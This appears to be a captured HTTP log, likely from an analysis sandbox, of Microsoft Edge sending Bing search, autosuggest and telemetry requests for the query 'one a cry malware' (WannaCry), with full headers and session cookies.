useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-kqteY5BQgrsF/eVmX4dJ9T/7ERaPGULVgjdJu3VA6Ho='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:13 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199053.1491c46c
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awann%2Ci%3A21%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051424%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awann%2Ci%3A20%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051448%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A22%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051558%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A19%22%2C%22AsResponseLength%22%3A%222069%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051603%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A19%2Cig%3ADE0261137A35471B8F3706E7BE84C393%22%2C%22AnswerInfo%22%3A%22LS%3B3%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051604%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awann%2Ci%3A20%22%2C%22AsResponseLength%22%3A%22938%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051613%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A20%2Cig%3A707E9494E2DC461686D487926254DBED%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051613%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22AsResponseLength%22%3A%22923%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051686%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%2Cig%3A624394393F064E96A0FF01D96179E1E0%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051687%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awann%2Ci%3A21%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051424%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awann%2Ci%3A20%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051448%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A22%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051558%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051580%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A19%22%2C%22AsResponseLength%22%3A%222069%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051603%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A19%2Cig%3ADE0261137A35471B8F3706E7BE84C393%22%2C%22AnswerInfo%22%3A%22LS%3B3%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051604%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awann%2Ci%3A20%22%2C%22AsResponseLength%22%3A%22938%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051613%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A20%2Cig%3A707E9494E2DC461686D487926254DBED%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051613%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22AsResponseLength%22%3A%22923%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199051686%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%2Cig%3A624394393F064E96A0FF01D96179E1E0%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199051687%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199054.1491cb49
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 10882
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199054.1491cc1a
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannac&cp=6&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wannac&cp=6&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 733
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bce32574861be959e55517d27c4
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-OZ0CkLQErW8+Bsn8UkMkhOl8o2WURCS15P4eBkEcQbM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:14 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199054.1491cd6f
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199051693%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A5%2C%20%5C%22GL%5C%22%3A2%2C%20%5C%22IG%5C%22%3A%5C%22624394393F064E96A0FF01D96179E1E0%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199051693%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A23%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199052806%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199052827%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22AsResponseLength%22%3A%22742%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199053029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%2Cig%3A15CD7EC87E3945C8B1FBF205FD171BE8%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199053029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199053032%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A6%2C%20%5C%22GL%5C%22%3A2%2C%20%5C%22IG%5C%22%3A%5C%2215CD7EC87E3945C8B1FBF205FD171BE8%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199053032%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awanna%2Ci%3A21%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199051693%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A5%2C%20%5C%22GL%5C%22%3A2%2C%20%5C%22IG%5C%22%3A%5C%22624394393F064E96A0FF01D96179E1E0%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199051693%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A23%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199052806%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199052827%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22AsResponseLength%22%3A%22742%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199053029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%2Cig%3A15CD7EC87E3945C8B1FBF205FD171BE8%22%2C%22AnswerInfo%22%3A%22LS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199053029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awannac%2Ci%3A22%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199053032%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A6%2C%20%5C%22GL%5C%22%3A2%2C%20%5C%22IG%5C%22%3A%5C%2215CD7EC87E3945C8B1FBF205FD171BE8%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199053032%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 728
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bce76354b36978be5ecaf771ef7
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
